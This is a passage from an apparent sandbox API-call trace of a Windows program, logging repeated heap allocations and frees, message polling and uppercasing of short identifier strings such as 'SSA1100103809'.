(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0200.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0200.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0200.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0200.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0200.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0200.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0200.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0200.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0200.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0200.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0200.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0200.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0200.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0200.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0200.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0200.319] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0200.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0200.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab10 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0200.319] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0200.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0200.319] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0200.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0200.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0200.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0200.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0200.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0200.320] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0200.320] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0200.320] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0200.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa840 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743e8 [0200.320] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0200.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0200.321] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0200.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0200.321] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0200.321] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0200.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0200.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0200.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0200.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0200.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743e8 | out: hHeap=0x2af0000) returned 1 [0200.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0200.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0200.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0200.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0200.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0200.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0200.322] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0200.322] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0200.322] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0200.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0200.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa840 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748f8 [0200.322] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0200.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0200.323] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0200.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0200.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0200.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0200.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0200.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0200.323] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0200.323] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0200.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0200.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0200.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0200.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0200.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0200.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.324] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748f8 | out: hHeap=0x2af0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0200.324] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0200.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0200.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0200.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0200.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0200.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0200.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0200.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0200.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0200.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0200.325] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0200.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9a8 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0200.325] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0200.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0200.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0200.326] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: 